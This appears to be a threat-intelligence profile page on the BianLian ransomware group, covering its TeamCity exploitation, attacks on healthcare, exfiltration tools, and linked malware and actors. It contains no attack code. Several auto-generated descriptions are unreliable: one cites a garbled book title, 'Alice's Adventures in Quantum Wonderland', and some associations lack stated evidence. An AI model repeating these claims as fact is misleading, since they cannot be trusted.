Bianlian

Threat Actor updated 19 hours ago (2024-11-20T18:08:27.438Z)
Download STIX
Preview STIX
BianLian is a threat actor group known for its malicious activities, primarily involving ransomware attacks. The group has been particularly active in 2024, exploiting bugs in JetBrains TeamCity software to launch its attacks. This method of attack has caused significant disruptions and data breaches across various sectors. Notably, the group claimed responsibility for an April attack on MMC's healthcare services that disrupted operations for several days and resulted in a data breach affecting 559,000 individuals. Other victims of BianLian this year include Tennessee-based Murfreesboro Medical Clinic & SurgiCenter and Boston Children's Health Physicians. In September 2024, modePUSH reported that BianLian, along with the Rhysida ransomware group, shifted their tactics. They began using Azure Storage Explorer to exfiltrate data from victim environments, abandoning historically popular tools like MEGAsync and rclone. SentinelLabs noted this change in their report. Furthermore, in October 2024, Trend Micro reported that a ransomware actor mimicking the notorious LockBit ransomware group used samples that leverage Amazon’s S3 storage to exfiltrate data stolen from targeted Windows or macOS systems. The BianLian group has demonstrated a particular focus on the healthcare industry, ranking among the top three ransomware groups targeting this sector by victim volume during the first nine months of 2024, according to a threat intelligence report by GuidePoint Security. The group's recent victims include Boston Children's Health Physicians, with BianLian threatening to release stolen patient and employee data on its dark web site. Additionally, the group has expanded its targets to other industries, as evidenced by the attack on Evolution Mining and Northern Minerals earlier in 2024.
Description last updated: 2024-11-15T16:09:03.714Z
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Aliases We are not currently tracking any aliases
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Ransomware
Extortion
Backdoor
Malware
Ransom
Exploit
Encryption
Windows
Lateral Move...
Encrypt
Healthcare
Teamcity
PowerShell
Android
Azure
Australian
T1566
Exploits
Antivirus
Implant
CISA
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Associated Malware
To see the evidence that has resulted in these malware associations, create a free account
Alias DescriptionAssociation TypeVotes
The Lockbit Malware is associated with Bianlian. LockBit is a malicious software, or malware, known for its damaging and exploitative functions. It infiltrates systems via dubious downloads, emails, or websites, often without the user's knowledge, and can steal personal information, disrupt operations, or hold data hostage for ransom. The LockBit Unspecified
4
The Blackbasta Malware is associated with Bianlian. BlackBasta is a notorious malware, particularly known for its ransomware attacks. The group behind it has been linked with other harmful software such as IcedID, NetSupport, Gozi, PikaBot, Pushdo, Quantum, Royal, and Nokoyawa. Artifacts and indicators of compromise (IoCs) suggest a possible relationUnspecified
3
The Black Basta Malware is associated with Bianlian. Black Basta is a notorious malware group known for its sophisticated ransomware attacks, which have targeted numerous high-profile entities. The group has demonstrated a remarkable ability to adapt their tactics, techniques, and procedures (TTPs), allowing them to effectively evade security defensesis related to
2
The Clop Malware is associated with Bianlian. Clop, a malicious software (malware), is linked to a Russian-speaking cybercriminal group also known as Cl0p. It is designed to exploit and damage computer systems by stealing personal information, disrupting operations, or holding data hostage for ransom. In May 2023, the Clop group began exploitinUnspecified
2
The Cerberus Malware is associated with Bianlian. Cerberus is a potent Android banking trojan that first surfaced on underground marketplaces in 2019. This malicious software, which operates as a hidden application on the victim's device, infiltrates systems via suspicious downloads, emails, or websites without the user's awareness. Once inside, itUnspecified
2
The Teabot Malware is associated with Bianlian. TeaBot, also known as Anatsa, is a sophisticated malware that has been impacting Android devices. It first emerged as a significant threat in 2022 when it was identified as one of the most active banking malware families alongside Flubot, Sharkbot, and Hydra. TeaBot, along with other notable bankingUnspecified
2
The Karakurt Malware is associated with Bianlian. Karakurt is a malicious software (malware) that has been linked to significant data extortion activities. The malware is affiliated with the notorious Conti cybercrime syndicate and ITG23, which are known for their disruptive operations, including data theft and ransom demands. In 2023, there was a Unspecified
2
Associated Threat Actors
To see the evidence that has resulted in these threatActor associations, create a free account
Alias DescriptionAssociation TypeVotes
The Alphv Threat Actor is associated with Bianlian. Alphv, also known as BlackCat, is a notable threat actor in the cybersecurity landscape. Originating from Russia, this cybercriminal group has been involved in multiple high-profile ransomware attacks, specifically targeting healthcare providers. They gained significant attention after stealing 5TB Unspecified
3
The Vice Society Threat Actor is associated with Bianlian. Vice Society, a threat actor or hacking team with malicious intent, has been active since 2022 and has made significant waves in the cybersecurity world. The group is known for deploying various forms of ransomware, including BlackCat, Quantum Locker, Zeppelin, and their own branded variant of ZeppeUnspecified
2
The Qilin Threat Actor is associated with Bianlian. Qilin, a threat actor known for its malicious activities in the cyberspace, has been on the rise with an increase in victim count by 44% reaching 140 in Q3. This group is part of the Octo Tempest group which recently added RansomHub and Qilin ransomware to its arsenal, enhancing its capabilities to Unspecified
2
The Rhysida Threat Actor is associated with Bianlian. Rhysida is a globally active threat actor known for its ransomware operations, which have impacted a wide range of sectors, particularly the government and public sector. Their use of CleanUpLoader makes their operations highly effective and difficult to detect, as it not only facilitates persistencUnspecified
2
The White Rabbit Threat Actor is associated with Bianlian. White Rabbit is a notable threat actor in the cybersecurity landscape, known for its malicious activities and association with other prominent hacking groups. The group's name, derived from the character in Alice's Adventures in Quantum Wonderland, signifies its unique approach to cyber attacks. In Unspecified
2
Source Document References
Information about the Bianlian Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
PreviewSource LinkCreatedAtTitle
BankInfoSecurity
a month ago
CISA
5 hours ago
InfoSecurity-magazine
6 days ago
DARKReading
6 days ago
Checkpoint
a month ago
BankInfoSecurity
a month ago
InfoSecurity-magazine
3 months ago
Securityaffairs
3 months ago
Securityaffairs
4 months ago
CERT-EU
a year ago
Securityaffairs
4 months ago
Securityaffairs
4 months ago
DARKReading
4 months ago
Unit42
4 months ago
Securityaffairs
4 months ago
Securityaffairs
4 months ago
Checkpoint
5 months ago
Securityaffairs
5 months ago
Securityaffairs
5 months ago
Securityaffairs
5 months ago